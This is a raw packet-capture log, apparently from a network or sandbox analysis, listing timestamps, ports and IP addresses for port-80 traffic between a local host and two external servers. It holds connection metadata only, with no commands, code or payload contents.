Dec 18, 2024 13:38:48.957667112 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.957804918 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.957904100 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.958318949 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.958389044 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.958425045 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.958494902 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.959386110 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.959527969 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.959752083 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.960660934 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.960798025 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.960819006 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.961817026 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.961867094 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.961935997 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.961999893 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.962873936 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.963107109 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.963229895 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.964103937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.964266062 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.964608908 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.965276957 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.965365887 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.965557098 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.965569973 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.965646982 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.965857983 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.965867996 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.965877056 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.965888023 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.965900898 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.965910912 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.965946913 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.965956926 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.965977907 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.965987921 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966002941 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966012955 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966022968 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966032982 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966042995 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966052055 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966150999 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966161013 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966171026 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966207981 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966312885 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966325045 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966486931 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.966758966 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.966769934 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966847897 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.966933966 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966943979 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966953993 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966963053 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966972113 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966984987 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.966994047 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.967004061 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.967012882 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.967106104 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.967117071 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.967133999 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.967143059 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.967153072 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.967205048 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.967216015 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.967225075 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.967248917 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.967258930 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.967354059 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.967622042 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.967700005 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.967835903 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.967906952 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.968748093 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.968802929 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.969037056 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.969124079 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.969959974 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.970065117 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.970215082 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.970278978 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.971131086 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.971255064 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.971288919 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.971343040 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.972234011 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.972470045 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.972529888 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.973449945 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.973578930 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.973706961 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.974590063 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.974653006 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.974765062 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.975717068 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.975748062 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.975790977 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.975889921 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.975923061 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.976950884 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.977011919 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.977062941 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.978323936 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.978368998 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.978406906 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.978406906 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.979425907 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.979721069 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.979726076 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.979875088 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.980406046 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.980459929 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.980743885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.980797052 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.981611013 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.981657028 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.981815100 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.982758045 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.982846975 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.983035088 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.983952045 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.984055042 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.984126091 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.984173059 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.985090971 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.985289097 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.985380888 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.986268997 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.986434937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.986563921 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.987456083 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.987519979 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.987664938 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.988404989 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.988652945 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.988768101 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.988795996 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.988871098 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.989768982 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.989945889 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.990046978 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.990931034 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.991107941 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.991168976 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.992130995 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.992300034 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.992423058 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.993268013 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.993320942 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.993482113 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.993781090 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.994537115 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.994637966 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.994690895 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.995624065 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.995754004 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.995925903 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.996191978 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.996929884 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.997004986 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.997047901 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.998169899 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.998229027 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.998291969 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.998444080 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.999219894 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.999285936 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.999353886 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.999420881 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.000425100 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.000471115 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.000633955 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.000771999 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.002022028 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.002249956 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.002309084 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.003083944 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.003235102 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.003319025 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.004002094 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.004105091 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.004211903 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.005037069 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.005091906 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.005156994 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.005228996 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.006175041 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.006324053 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.006458044 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.007354021 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.007472038 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.007586956 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.008496046 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.008652925 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.008677006 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.009656906 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.009742975 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.009951115 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.009999990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.010823011 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.010905027 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.010986090 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.011069059 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.011985064 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.012092113 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.012185097 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.013196945 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.013375998 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.013458014 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.014305115 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.014451027 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.014547110 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.014592886 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.015574932 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.015681028 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.015728951 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.016786098 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.016902924 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.016927958 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.017899036 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.017977953 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.018023968 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.018083096 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.019119978 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.019347906 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.149753094 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.149833918 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.149935007 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.149935007 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.150223970 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.150274992 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.150477886 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.150537014 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.151395082 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.151520967 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.151835918 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.151951075 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.152089119 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.152194023 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.153112888 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.153265953 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.153372049 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.153462887 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.169431925 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.169516087 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.169559956 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.169559956 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.170188904 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.170783043 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.170847893 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.170869112 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.170909882 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.171403885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.171417952 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.171561003 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.172158957 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.172172070 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.172218084 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.172821999 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.172842026 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.172852993 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.172890902 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.172890902 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.173583031 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.173597097 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.173703909 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.174321890 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.174334049 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.174407959 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.175736904 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.175750971 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.175761938 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.175798893 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.175827026 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.176373005 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.176384926 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.176431894 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.177195072 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.177206993 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.177290916 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.177952051 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.177966118 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.178117990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.178648949 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.178666115 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.178694010 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.178718090 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.178718090 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.178735018 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.179411888 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.179425955 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.179510117 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.179959059 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.179972887 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.180020094 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.180735111 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.180748940 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.180840969 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.181308031 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.181322098 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.181363106 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.181401968 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.181974888 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.181988001 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.181999922 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.182027102 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.182173967 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.183455944 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.183469057 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.183609962 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.183881044 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.183895111 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.183948994 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.184272051 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.184286118 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.184324980 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.184396982 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.184806108 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.184825897 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.184838057 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.184855938 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.184876919 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.184876919 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.185463905 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.185478926 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.185522079 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.185556889 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.186053991 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.186068058 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.186171055 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.186670065 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.186683893 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.186767101 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:49.187233925 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:49.187247038 CET	80	49723	31.41.244.11	192.168.2.8
